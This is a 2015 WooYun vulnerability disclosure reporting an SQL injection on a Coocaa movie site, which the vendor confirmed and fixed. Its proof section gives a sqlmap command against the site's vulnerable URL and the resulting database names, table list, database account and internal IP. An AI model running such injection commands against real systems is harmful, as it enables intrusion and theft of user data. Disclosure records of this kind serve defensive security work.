当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090444

漏洞标题:酷开某站点sql注入10万用户信息告急

相关厂商:深圳市酷开网络科技有限公司

漏洞作者: Forever80s

提交时间:2015-01-07 16:23

修复时间:2015-01-13 12:01

公开时间:2015-01-13 12:01

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-07: 细节已通知厂商并且等待厂商处理中
2015-01-08: 厂商已经确认,细节仅向厂商公开
2015-01-13: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

详细说明:

漏洞证明:

修复方案:

sqlmap -u "http://movie.coocaa.com/self/pl.php?id=3391750&classid=62"  --random-agent --dbs


[*] coocaa_web_new
[*] information_schema
[*] test


+----------------------------------+
| allinfo |
| ecs_region |
| movie_black |
| movie_key |
| phome_ecms_aippay |
| phome_ecms_aippay_log |
| phome_ecms_allinfo |
| phome_ecms_allinfo_data_1 |
| phome_ecms_allinfo_doc |
| phome_ecms_allinfo_doc_data |
| phome_ecms_application |
| phome_ecms_application_data_1 |
| phome_ecms_application_doc |
| phome_ecms_application_doc_data |
| phome_ecms_banner_start |
| phome_ecms_ccpay |
| phome_ecms_ccpay_data_1 |
| phome_ecms_ccpay_doc |
| phome_ecms_ccpay_doc_data |
| phome_ecms_changepics |
| phome_ecms_changepics_data_1 |
| phome_ecms_changepics_doc |
| phome_ecms_changepics_doc_data |
| phome_ecms_chong |
| phome_ecms_chong_data_1 |
| phome_ecms_chong_doc |
| phome_ecms_chong_doc_data |
| phome_ecms_common |
| phome_ecms_common_data_1 |
| phome_ecms_common_doc |
| phome_ecms_common_doc_data |
| phome_ecms_download |
| phome_ecms_download_data_1 |
| phome_ecms_download_doc |
| phome_ecms_download_doc_data |
| phome_ecms_dt |
| phome_ecms_dt_data_1 |
| phome_ecms_dt_doc |
| phome_ecms_dt_doc_data |
| phome_ecms_faq |
| phome_ecms_faq_data_1 |
| phome_ecms_faq_doc |
| phome_ecms_faq_doc_data |
| phome_ecms_game |
| phome_ecms_game_data_1 |
| phome_ecms_game_doc |
| phome_ecms_game_doc_data |
| phome_ecms_gstrategy |
| phome_ecms_gstrategy_data_1 |
| phome_ecms_gstrategy_doc |
| phome_ecms_gstrategy_doc_data |
| phome_ecms_info |
| phome_ecms_info_data_1 |
| phome_ecms_info_doc |
| phome_ecms_info_doc_data |
| phome_ecms_infoclass_allinfo |
| phome_ecms_infoclass_application |
| phome_ecms_infoclass_ccpay |
| phome_ecms_infoclass_changepics |
| phome_ecms_infoclass_chong |
| phome_ecms_infoclass_common |
| phome_ecms_infoclass_download |
| phome_ecms_infoclass_dt |
| phome_ecms_infoclass_faq |
| phome_ecms_infoclass_game |
| phome_ecms_infoclass_gstrategy |
| phome_ecms_infoclass_info |
| phome_ecms_infoclass_mediapics |
| phome_ecms_infoclass_message |
| phome_ecms_infoclass_movie |
| phome_ecms_infoclass_news |
| phome_ecms_infoclass_phb |
| phome_ecms_infoclass_pj |
| phome_ecms_infoclass_pjdetail |
| phome_ecms_infoclass_pro |
| phome_ecms_infoclass_searchword |
| phome_ecms_infoclass_shop |
| phome_ecms_infoclass_shopcert |
| phome_ecms_infoclass_tv |
| phome_ecms_infoclass_tvfittings |
| phome_ecms_infoclass_yqlj |
| phome_ecms_infoclass_yw |
| phome_ecms_infoclass_zp |
| phome_ecms_infotmp_allinfo |
| phome_ecms_infotmp_application |
| phome_ecms_infotmp_ccpay |
| phome_ecms_infotmp_changepics |
| phome_ecms_infotmp_chong |
| phome_ecms_infotmp_common |
| phome_ecms_infotmp_download |
| phome_ecms_infotmp_dt |
| phome_ecms_infotmp_faq |
| phome_ecms_infotmp_game |
| phome_ecms_infotmp_gstrategy |
| phome_ecms_infotmp_info |
| phome_ecms_infotmp_mediapics |
| phome_ecms_infotmp_message |
| phome_ecms_infotmp_movie |
| phome_ecms_infotmp_news |
| phome_ecms_infotmp_phb |
| phome_ecms_infotmp_pj |
| phome_ecms_infotmp_pjdetail |
| phome_ecms_infotmp_pro |
| phome_ecms_infotmp_searchword |
| phome_ecms_infotmp_shop |
| phome_ecms_infotmp_shopcert |
| phome_ecms_infotmp_tv |
| phome_ecms_infotmp_yqlj |
| phome_ecms_infotmp_zp |
| phome_ecms_mediapics |
| phome_ecms_mediapics_data_1 |
| phome_ecms_mediapics_doc |
| phome_ecms_mediapics_doc_data |
| phome_ecms_message |
| phome_ecms_message_data_1 |
| phome_ecms_message_doc |
| phome_ecms_message_doc_data |
| phome_ecms_movie |
| phome_ecms_movie_data_1 |
| phome_ecms_movie_doc |
| phome_ecms_movie_doc_data |
| phome_ecms_news |
| phome_ecms_news_data_1 |
| phome_ecms_news_doc |
| phome_ecms_news_doc_data |
| phome_ecms_phb |
| phome_ecms_phb_data_1 |
| phome_ecms_phb_doc |
| phome_ecms_phb_doc_data |
| phome_ecms_pj |
| phome_ecms_pj_data_1 |
| phome_ecms_pj_doc |
| phome_ecms_pj_doc_data |
| phome_ecms_pjdetail |
| phome_ecms_pjdetail_data_1 |
| phome_ecms_pjdetail_doc |
| phome_ecms_pjdetail_doc_data |
| phome_ecms_pro |
| phome_ecms_pro_data_1 |
| phome_ecms_pro_doc |
| phome_ecms_pro_doc_data |
| phome_ecms_searchword |
| phome_ecms_searchword_data_1 |
| phome_ecms_searchword_doc |
| phome_ecms_searchword_doc_data |
| phome_ecms_shop |
| phome_ecms_shop_data_1 |
| phome_ecms_shop_doc |
| phome_ecms_shop_doc_data |
| phome_ecms_shopcert |
| phome_ecms_shopcert_data_1 |
| phome_ecms_shopcert_doc |
| phome_ecms_shopcert_doc_data |
| phome_ecms_tv |
| phome_ecms_tv_data_1 |
| phome_ecms_tv_doc |
| phome_ecms_tv_doc_data |
| phome_ecms_yqlj |
| phome_ecms_yqlj_data_1 |
| phome_ecms_yqlj_doc |
| phome_ecms_yqlj_doc_data |
| phome_ecms_zmhs |
| phome_ecms_zp |
| phome_ecms_zp_data_1 |
| phome_ecms_zp_doc |
| phome_ecms_zp_doc_data |
| phome_enewsad |
| phome_enewsadclass |
| phome_enewsadminstyle |
| phome_enewsbefrom |
| phome_enewsbq |
| phome_enewsbqclass |
| phome_enewsbqtemp |
| phome_enewsbqtempclass |
| phome_enewsbuybak |
| phome_enewsbuygroup |
| phome_enewscard |
| phome_enewsclass |
| phome_enewsclassadd |
| phome_enewsclassf |
| phome_enewsclasstemp |
| phome_enewsclasstempclass |
| phome_enewsdiggips |
| phome_enewsdo |
| phome_enewsdolog |
| phome_enewsdownerror |
| phome_enewsdownrecord |
| phome_enewsdownurlqz |
| phome_enewserrorclass |
| phome_enewsf |
| phome_enewsfava |
| phome_enewsfavaclass |
| phome_enewsfeedback |
| phome_enewsfeedbackclass |
| phome_enewsfeedbackf |
| phome_enewsfile |
| phome_enewsgbook |
| phome_enewsgbookclass |
| phome_enewsgfenip |
| phome_enewsgroup |
| phome_enewshy |
| phome_enewshyclass |
| phome_enewsindexpage |
| phome_enewsinfoclass |
| phome_enewsinfotype |
| phome_enewsinfovote |
| phome_enewsjstemp |
| phome_enewsjstempclass |
| phome_enewskey |
| phome_enewslink |
| phome_enewslinkclass |
| phome_enewslinktmp |
| phome_enewslisttemp |
| phome_enewslisttempclass |
| phome_enewslog |
| phome_enewsloginfail |
| phome_enewsmember |
| phome_enewsmemberadd |
| phome_enewsmemberf |
| phome_enewsmemberfeedback |
| phome_enewsmemberform |
| phome_enewsmembergbook |
| phome_enewsmembergroup |
| phome_enewsmenu |
| phome_enewsmenuclass |
| phome_enewsmod |
| phome_enewsnewstemp |
| phome_enewsnewstempclass |
| phome_enewsnotcj |
| phome_enewspage |
| phome_enewspageclass |
| phome_enewspagetemp |
| phome_enewspayapi |
| phome_enewspayrecord |
| phome_enewspic |
| phome_enewspicclass |
| phome_enewspl |
| phome_enewspl_data_1 |
| phome_enewsplayer |
| phome_enewsplf |
| phome_enewspltemp |
| phome_enewspostdata |
| phome_enewspostserver |
| phome_enewsprinttemp |
| phome_enewspublic |
| phome_enewspubtemp |
| phome_enewspubvar |
| phome_enewspubvarclass |
| phome_enewsqmsg |
| phome_enewssearch |
| phome_enewssearchall |
| phome_enewssearchall_load |
| phome_enewssearchtemp |
| phome_enewssearchtempclass |
| phome_enewsshopdd |
| phome_enewsshoppayfs |
| phome_enewsshopps |
| phome_enewssp |
| phome_enewssp_1 |
| phome_enewssp_2 |
| phome_enewssp_3 |
| phome_enewssp_3_bak |
| phome_enewsspacestyle |
| phome_enewsspclass |
| phome_enewssql |
| phome_enewstable |
| phome_enewstags |
| phome_enewstagsclass |
| phome_enewstagsdata |
| phome_enewstask |
| phome_enewstempbak |
| phome_enewstempgroup |
| phome_enewstempvar |
| phome_enewstempvarclass |
| phome_enewstogzts |
| phome_enewsuser |
| phome_enewsuseradd |
| phome_enewsuserclass |
| phome_enewsuserjs |
| phome_enewsuserlist |
| phome_enewsvote |
| phome_enewsvotemod |
| phome_enewsvotetemp |
| phome_enewswapstyle |
| phome_enewswfinfo |
| phome_enewswfinfolog |
| phome_enewswords |
| phome_enewsworkflow |
| phome_enewsworkflowitem |
| phome_enewswriter |
| phome_enewsyh |
| phome_enewszt |
| phome_enewsztadd |
| phome_enewsztclass |
| phome_enewsztf |
| phome_pc_zmhs |
| res_imagedetail |
| res_movieinfo |
| res_resourceinfo |
| vrm_cpmovieinfo |
| winners_award |
| yzdd_excel |
| yzdd_result |
| yzdd_result_all |
| yzdd_result_glass |
| yzdd_result_info |
| yzdd_user |
+----------------------------------+


[*] 'web'@'192.168.0.52'

版权声明:转载请注明来源 Forever80s@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-01-08 11:43

厂商回复:

多谢。马上进行修复。

最新状态:

2015-01-13:已修复


漏洞评价:

评论